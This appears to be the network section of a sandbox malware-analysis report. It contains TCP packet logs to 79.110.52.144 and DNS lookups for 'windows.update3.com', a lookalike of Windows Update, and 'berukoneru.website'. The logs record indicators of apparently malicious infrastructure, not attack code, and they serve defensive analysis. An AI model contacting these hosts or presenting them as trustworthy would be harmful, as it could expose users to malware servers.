                            Dec 14, 2021 10:21:39.309588909 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.309609890 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.309633017 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.309674025 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.310422897 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.322355986 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.322402000 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.322501898 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.322987080 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.323014975 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.329354048 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.329412937 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.329461098 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.329483986 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.329540014 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.329560041 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.329663038 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.329701900 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.329783916 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.329802036 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.329874992 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.329878092 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.329938889 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.330358028 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.330379009 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.330447912 CET49814443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.330462933 CET4434981479.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.352863073 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.388778925 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.388822079 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.388885975 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.388916016 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.388952017 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.388976097 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.389036894 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.389807940 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.389849901 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.389935970 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.389954090 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.389997959 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.390011072 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.401732922 CET49817443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.401771069 CET4434981779.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.401864052 CET49817443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.402520895 CET49817443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.402549028 CET4434981779.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.403845072 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.403939962 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.405621052 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.405631065 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.406097889 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.407932043 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.412658930 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.412718058 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.412772894 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.412792921 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.412821054 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.412841082 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.413609982 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.413650036 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.413717985 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.413732052 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.413779974 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.413794041 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.415193081 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.415232897 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.415308952 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.415323973 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.415366888 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.415380001 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.435996056 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.436043978 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.436110020 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.436125040 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.436172962 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.436197042 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.436434031 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.436475039 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.436531067 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.436547995 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.436573982 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.436614037 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.437021017 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.437062979 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.437107086 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.437120914 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.437151909 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.437167883 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.438282013 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.438321114 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.438381910 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.438394070 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.438436985 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.438456059 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.438683033 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.438724041 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.438772917 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.438787937 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.438823938 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.438843012 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.439093113 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.439132929 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.439178944 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.439189911 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.439229965 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.439241886 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.440414906 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.440454960 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.440512896 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.440527916 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.440563917 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.440579891 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.448872089 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.459743023 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.459786892 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.460012913 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.460031033 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.460253954 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.460292101 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.460295916 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.460304976 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.460325003 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.460391998 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.460465908 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.460686922 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.460728884 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.460908890 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.460923910 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.461033106 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.461131096 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.461169958 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.461236954 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.461247921 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.461340904 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.461405993 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.461504936 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.461519003 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.461540937 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.461672068 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.461689949 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.465207100 CET49815443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.465233088 CET4434981579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.484955072 CET4434981779.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.485085964 CET49817443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.487296104 CET49817443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.487332106 CET4434981779.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.487806082 CET4434981779.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.489798069 CET49817443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.499596119 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.499648094 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.499699116 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.499754906 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.499779940 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.499799013 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.499886036 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.500494957 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.500535965 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.500585079 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.500605106 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.500636101 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.500657082 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.523483992 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.523538113 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.523596048 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.523622036 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.523643017 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.523869038 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.524446011 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.524487019 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.524611950 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.524636030 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.524770975 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.524959087 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.526329994 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.526375055 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.526498079 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.526520967 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.526536942 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.526603937 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.532861948 CET4434981779.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.546981096 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.547039032 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.547087908 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.547122002 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:39.547173023 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.547180891 CET49816443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:39.547393084 CET4434981679.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.017461061 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.017482996 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.017869949 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.018013954 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018054008 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018167019 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.018176079 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018184900 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.018189907 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018250942 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.018253088 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.018332958 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.019790888 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.021358013 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.021373987 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.021435022 CET49820443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.021445036 CET4434982079.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.036642075 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.036705971 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.036819935 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.037522078 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.037543058 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.064874887 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.079672098 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.079788923 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.079900980 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.079957008 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.080010891 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.080570936 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.080594063 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.080688000 CET49821443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.080698967 CET4434982179.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.119164944 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.119303942 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.121375084 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.121393919 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.121696949 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.123877048 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.164869070 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.202713966 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.202754974 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.202840090 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.202900887 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.204139948 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.204320908 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.204350948 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.204624891 CET49822443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.204637051 CET4434982279.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.510907888 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.510943890 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.511760950 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.511806011 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.511816025 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.590121031 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.590529919 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.591964006 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.591984034 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.592453003 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.594264984 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.636878967 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662166119 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662188053 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662326097 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662374973 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.662494898 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.662801981 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.662818909 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.662827015 CET49823443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.662837982 CET4434982379.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.839658976 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.839715958 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.839895010 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.843355894 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.843389034 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.922907114 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.923186064 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.925105095 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.925117016 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.925614119 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.929003000 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.972866058 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.977659941 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.977699041 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.977782965 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.977938890 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.978286982 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.978313923 CET4434982579.110.52.144192.168.2.6
                            Dec 14, 2021 10:21:40.978327036 CET49825443192.168.2.679.110.52.144
                            Dec 14, 2021 10:21:40.978338957 CET4434982579.110.52.144192.168.2.6

                            UDP Packets


                            DNS Queries

                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                            Dec 14, 2021 10:21:27.879158020 CET | 192.168.2.6 | 8.8.8.8 | 0xe710 | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.005357981 CET | 192.168.2.6 | 8.8.8.8 | 0x8816 | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.100939989 CET | 192.168.2.6 | 8.8.8.8 | 0x9c94 | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.618268013 CET | 192.168.2.6 | 8.8.8.8 | 0x9cd0 | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:38.683651924 CET | 192.168.2.6 | 8.8.8.8 | 0x766e | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:38.937886000 CET | 192.168.2.6 | 8.8.8.8 | 0x1f47 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.074219942 CET | 192.168.2.6 | 8.8.8.8 | 0x1098 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.206109047 CET | 192.168.2.6 | 8.8.8.8 | 0x3ff7 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.301306009 CET | 192.168.2.6 | 8.8.8.8 | 0x48be | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.382054090 CET | 192.168.2.6 | 8.8.8.8 | 0xc3c5 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.611248016 CET | 192.168.2.6 | 8.8.8.8 | 0xdf42 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.729481936 CET | 192.168.2.6 | 8.8.8.8 | 0xbf7b | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:39.907537937 CET | 192.168.2.6 | 8.8.8.8 | 0xd2f2 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:40.019191027 CET | 192.168.2.6 | 8.8.8.8 | 0xbbba | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:40.492409945 CET | 192.168.2.6 | 8.8.8.8 | 0x1433 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:40.775444984 CET | 192.168.2.6 | 8.8.8.8 | 0xe94f | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:22:41.757524967 CET | 192.168.2.6 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
                            Dec 14, 2021 10:22:41.779015064 CET | 192.168.2.6 | 8.8.8.8 | 0x2 | Standard query (0) | 1.0.0.127.in-addr.arpa | PTR (Pointer record) | IN (0x0001)

                            DNS Answers

                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                            Dec 14, 2021 10:21:27.897459030 CET | 8.8.8.8 | 192.168.2.6 | 0xe710 | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                            Dec 14, 2021 10:21:27.897459030 CET | 8.8.8.8 | 192.168.2.6 | 0xe710 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.12.124.139 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:27.897459030 CET | 8.8.8.8 | 192.168.2.6 | 0xe710 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.20.161.64 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:27.897459030 CET | 8.8.8.8 | 192.168.2.6 | 0xe710 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 18.219.227.107 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.022103071 CET | 8.8.8.8 | 192.168.2.6 | 0x8816 | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                            Dec 14, 2021 10:21:28.022103071 CET | 8.8.8.8 | 192.168.2.6 | 0x8816 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 18.219.227.107 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.022103071 CET | 8.8.8.8 | 192.168.2.6 | 0x8816 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.20.161.64 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.022103071 CET | 8.8.8.8 | 192.168.2.6 | 0x8816 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.12.124.139 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.121263027 CET | 8.8.8.8 | 192.168.2.6 | 0x9c94 | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                            Dec 14, 2021 10:21:28.121263027 CET | 8.8.8.8 | 192.168.2.6 | 0x9c94 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.20.161.64 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.121263027 CET | 8.8.8.8 | 192.168.2.6 | 0x9c94 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 18.219.227.107 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.121263027 CET | 8.8.8.8 | 192.168.2.6 | 0x9c94 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.12.124.139 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.635057926 CET | 8.8.8.8 | 192.168.2.6 | 0x9cd0 | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                            Dec 14, 2021 10:21:28.635057926 CET | 8.8.8.8 | 192.168.2.6 | 0x9cd0 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.12.124.139 | A (IP address) | IN (0x0001)
                            Dec 14, 2021 10:21:28.635057926 CET | 8.8.8.8 | 192.168.2.6 | 0x9cd0 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.20.161.64 | A (IP address) | IN (0x0001)
